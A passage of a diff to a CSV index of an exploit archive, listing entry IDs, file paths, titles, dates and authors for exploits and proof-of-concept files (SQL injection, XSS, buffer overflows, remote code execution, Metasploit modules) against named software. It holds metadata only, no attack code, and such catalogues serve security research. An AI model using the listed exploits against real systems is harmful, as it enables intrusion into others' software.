Injection",2014-03-14,i-Hmx,php,webapps,80 +32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0 +32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php mac param) - Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -29027,18 +29103,14 @@ id,file,description,date,author,platform,type,port 32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 templates/Freeway/mainpage_modules/mainpage.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 Cookie Data SQL Injection Vulnerability",2008-08-18,IRCRASH,php,webapps,0 32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 - 'index.php' Cross-Site Scripting Vulnerability",2008-08-18,"ThE dE@Th",php,webapps,0 +32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 (article.php) - Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80 32275,platforms/php/webapps/32275.txt,"itMedia - Multiple SQL Injection Vulnerabilities",2008-08-18,baltazar,php,webapps,0 -32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (64-bit) - Remote Exploit for Linux (Generic)",2014-03-15,sorbo,linux,remote,0 +32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack-based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80 32278,platforms/asp/webapps/32278.txt,"K Web CMS 'sayfala.asp' SQL Injection Vulnerability",2008-08-18,baltazar,asp,webapps,0 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-08-19,"James Bercegay",php,webapps,0 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0 -32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 -32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0 -32284,platforms/php/webapps/32284.txt,"Simasy CMS - 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0 -32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0 -32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal Vulnerability",2008-08-21,"Deniz Cevik",linux,remote,0 32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 - 'index.php' Local File Include Vulnerability",2008-08-21,"Beenu Arora",php,webapps,0 32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0 32289,platforms/linux/remote/32289.txt,"Vim <= 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0 @@ -29083,7 +29155,6 @@ id,file,description,date,author,platform,type,port 32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal SEH Exploit (MSF)",2014-03-17,"Revin Hadi Saputra",windows,dos,0 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0 32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability",2014-03-17,"Ibrahim Raafat",php,webapps,0 -32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack-based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80 32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0 32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 - 'account.php' Cross-Site Scripting Vulnerability",2008-09-03,Xc0re,php,webapps,0 32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 Malformed 'view-source' HTTP Header Remote Denial of Service Vulnerability",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 @@ -29101,13 +29172,14 @@ id,file,description,date,author,platform,type,port 32347,platforms/php/webapps/32347.txt,"UBB.threads 7.3.1 - 'Forum[]' Array SQL Injection Vulnerability",2008-09-02,"James Bercegay",php,webapps,0 32348,platforms/linux/dos/32348.txt,"MySQL <= 6.0.4 - Empty Binary String Literal Remote Denial Of Service Vulnerability",2008-03-28,"Kay Roepke",linux,dos,0 32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0 -32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder NULL Pointer Dereference Denial of Service Vulnerability",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 +32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder NULL Pointer Dereference Denial of Service Vulnerability",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Include Vulnerabilities",2008-09-10,SirGod,php,webapps,0 32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script 'applynow.php' - SQL Injection Vulnerability",2008-09-10,InjEctOr5,php,webapps,0 32353,platforms/php/webapps/32353.txt,"Horde Application Framework <= 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting Vulnerability",2008-09-10,"Alexios Fakos",php,webapps,0 32354,platforms/php/webapps/32354.txt,"Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting Vulnerability",2008-09-10,"Alexios Fakos",php,webapps,0 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection Vulnerability",2008-09-10,r45c4l,php,webapps,0 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 +32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,metasploit,unix,remote,22 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0 32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0 32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 @@ -29117,8 +29189,6 @@ id,file,description,date,author,platform,type,port 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32365,platforms/php/webapps/32365.txt,"Paranews 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32366,platforms/php/webapps/32366.txt,"QuicO 'photo.php' SQL Injection Vulnerability",2008-09-12,"Beenu Arora",php,webapps,0 -32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,metasploit,unix,remote,22 -32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 32369,platforms/hardware/webapps/32369.txt,"Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities",2014-03-19,xistence,hardware,webapps,0 32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0 32371,platforms/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote,0 @@ -29131,36 +29201,6 @@ id,file,description,date,author,platform,type,port 32384,platforms/linux/dos/32384.txt,"Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service Vulnerability",2007-07-20,"Jens Axboe",linux,dos,0 32385,platforms/hardware/webapps/32385.txt,"Dlink DIR-600L Hardware Version AX Firmware 1.00 - CSRF Vulnerability",2014-03-20,"Dhruv Shah",hardware,webapps,0 32386,platforms/multiple/dos/32386.txt,"Unreal Engine 'UnChan.cpp' Failed Assertion Remote Denial of Service Vulnerability",2008-09-16,"Luigi Auriemma",multiple,dos,0 -32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-16,"John Cobb",php,webapps,0 -32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection Vulnerability",2008-09-17,"Hussin X",php,webapps,0 -32389,platforms/php/webapps/32389.txt,"Quick Cart <= 3.1 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-17,"John Cobb",php,webapps,0 -32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery Vulnerability (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 -32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery Vulnerability (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 -32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass and SQL Injection Vulnerabilities",2008-09-17,JosS,php,webapps,0 -32393,platforms/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution Vulnerability",2008-09-17,"Eli the Bearded",solaris,remote,0 -32394,platforms/asp/webapps/32394.txt,"Sama Educational Management System 'Error.asp' Cross-Site Scripting Vulnerability",2008-09-18,Lagon666,asp,webapps,0 -32395,platforms/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 Database Disclosure Vulnerability",2008-09-19,r45c4l,php,webapps,0 -32396,platforms/php/webapps/32396.txt,"Parallels H-Sphere 3.0/3.1 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-19,t0fx,php,webapps,0 -32397,platforms/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 - Multiple SQL Injection Vulnerabilities",2008-09-19,"Jan Van Niekerk",php,webapps,0 -32398,platforms/php/webapps/32398.txt,"eXtrovert software Thyme 1.3 - 'add_calendars.php' Cross-Site Scripting Vulnerability",2008-09-21,"DigiTrust Group",php,webapps,0 -32399,platforms/unix/remote/32399.txt,"Multiple Vendor FTP Server Long Command Handling Security Vulnerability",2008-09-20,"Maksymilian Arciemowicz",unix,remote,0 -32400,platforms/multiple/dos/32400.html,"Foxmail Email Client 6.5 - 'mailto' Buffer Overflow Vulnerability",2008-09-22,sebug,multiple,dos,0 -32401,platforms/asp/webapps/32401.txt,"rgb72 WCMS 1.0 - 'index.php' SQL Injection Vulnerability",2008-09-22,"CWH Underground",asp,webapps,0 -32402,platforms/php/webapps/32402.txt,"UNAK-CMS Cookie Authentication Bypass Vulnerability",2008-09-22,Ciph3r,php,webapps,0 -32403,platforms/php/webapps/32403.txt,"MapCal 0.1 - 'id' Parameter SQL Injection Vulnerability",2008-09-22,0x90,php,webapps,0 -32404,platforms/php/webapps/32404.html,"fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting Vulnerability",2008-09-22,"Fabian Fingerle",php,webapps,0 -32405,platforms/php/webapps/32405.txt,"xt:Commerce 3.04 advanced_search_result.php keywords Parameter XSS",2008-09-22,"David Vieira-Kurz",php,webapps,0 -32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 XTCsid Parameter Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 -32407,platforms/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session Fixation Vulnerability",2008-09-22,"David Vieira-Kurz",php,webapps,0 -32408,platforms/php/webapps/32408.txt,"BlueCUBE CMS 'tienda.php' SQL Injection Vulnerability",2008-09-21,r45c4l,php,webapps,0 -32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Parameter Cross-Site Scripting Vulnerability",2008-09-20,"Rohit Bansal",php,webapps,0 -32410,platforms/php/webapps/32410.txt,"6rbScript 'cat.php' SQL Injection Vulnerability",2008-09-22,"Karar Alshami",php,webapps,0 -32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0 -32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0 -32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0 -32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0 -32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0 -32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0 32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injection Vulnerabilities",2008-09-25,"David Sopas",php,webapps,0 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Include Vulnerability",2008-09-25,Pepelux,php,webapps,0 32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service Vulnerability",2008-09-25,Ciph3r,windows,dos,0 @@ -29182,7 +29222,7 @@ id,file,description,date,author,platform,type,port 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0 32438,platforms/windows/remote/32438.rb,"Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80 -32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22 +32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0 32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0 32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0 @@ -29215,15 +29255,19 @@ id,file,description,date,author,platform,type,port 32470,platforms/linux/remote/32470.rb,"CUPS <= 1.3.7 - 'HP-GL/2' Filter Remote Code Execution Vulnerability",2008-10-09,regenrecht,linux,remote,0 32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 JavaScript 'load' Function Denial of Service Vulnerability",2008-10-10,"Jeremy Brown",linux,dos,0 32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 Infinite Array Sort Denial of Service Vulnerability",2008-10-10,"Luca Carettoni",hardware,dos,0 -32473,platforms/php/webapps/32473.txt,"'com_jeux' Joomla! Component - 'id' Parameter SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 +32473,platforms/php/webapps/32473.txt,"com_jeux Joomla! Component - 'id' Parameter SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting Vulnerability",2008-10-11,d3v1l,php,webapps,0 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 - 'CREATE ANY DIRECTORY' Privilege Escalation Vulnerability",2008-10-13,"Paul M. Wright",multiple,remote,0 +32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x - 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability",2008-11-04,"Meder Kydyraliev",multiple,remote,0 32477,platforms/windows/dos/32477.py,"Windows Media Player 11.0.5721.5230 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic (.wav) Local Crash PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - (.wav) Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0 +32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 +32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro 'id' Parameter SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability",2008-10-13,tRoot,asp,webapps,0 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection Vulnerability",2008-10-14,"Angela Chang",php,webapps,0 32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0 @@ -29251,15 +29295,12 @@ id,file,description,date,author,platform,type,port 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 -32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0 -32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - (.m3u, .pls, .asx) Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 -32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - (.m3u, .pls, .asx) Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 +32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - (.m3u_ .pls_ .asx) Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 +32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - (.m3u_ .pls_ .asx) Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443 -32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 -32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0 -32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0 32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' URI Redirection Vulnerability",2008-10-23,xuanmumu,php,webapps,0 @@ -29302,8 +29343,6 @@ id,file,description,date,author,platform,type,port 32560,platforms/ios/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080 32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80 32562,platforms/php/webapps/32562.txt,"Joomla Kunena Component 3.0.4 - Persistent XSS",2014-03-27,Qoppa,php,webapps,80 -32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro 'id' Parameter SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0 -32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x - 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability",2008-11-04,"Meder Kydyraliev",multiple,remote,0 32565,platforms/multiple/remote/32565.txt,"Struts <= 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 - Cross-Site Scripting Vulnerability",2008-11-04,"Brad Antoniewicz",php,webapps,0 32567,platforms/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 @@ -29327,6 +29366,7 @@ id,file,description,date,author,platform,type,port 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server Username Enumeration Weakness",2008-11-14,"Bernardo Damele",windows,remote,0 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView ActiveX Component Heap Buffer Overflow Vulnerability",2008-11-15,r0ut3r,windows,dos,0 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS 'search_query' Parameter Cross-Site Scripting Vulnerability",2008-11-17,d3v1l,php,webapps,0 +32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80 32589,platforms/php/webapps/32589.html,"Kimson CMS 'id' Parameter Cross-Site Scripting Vulnerability",2008-11-18,md.r00t,php,webapps,0 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista 'iphlpapi.dll' Local Kernel Buffer Overflow Vulnerability",2008-11-19,"Marius Wachtler",windows,local,0 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0 @@ -29359,7 +29399,6 @@ id,file,description,date,author,platform,type,port 32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - XSS Remote Shell Exploit & Credentials Leak",2014-03-31,neglomaniac,php,remote,0 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 -32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80 32622,platforms/php/webapps/32622.txt,"Wordpress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read",2014-03-31,"Brandon Perry",multiple,webapps,0 32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 @@ -29397,6 +29436,7 @@ id,file,description,date,author,platform,type,port 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0 32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0 +32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service Vulnerability",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0 32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0 @@ -29426,7 +29466,7 @@ id,file,description,date,author,platform,type,port 32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0 32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0 -32689,platforms/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-Franois Leclerc",php,webapps,0 +32689,platforms/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0 32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow Vulnerability",2008-12-30,"Anton Khirnov",linux,remote,0 32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/Mms Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0 @@ -29442,7 +29482,6 @@ id,file,description,date,author,platform,type,port 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0 32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0 -32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0 32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0 32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0 32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 @@ -29468,7 +29507,7 @@ id,file,description,date,author,platform,type,port 32731,platforms/asp/webapps/32731.txt,"Active Bids search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 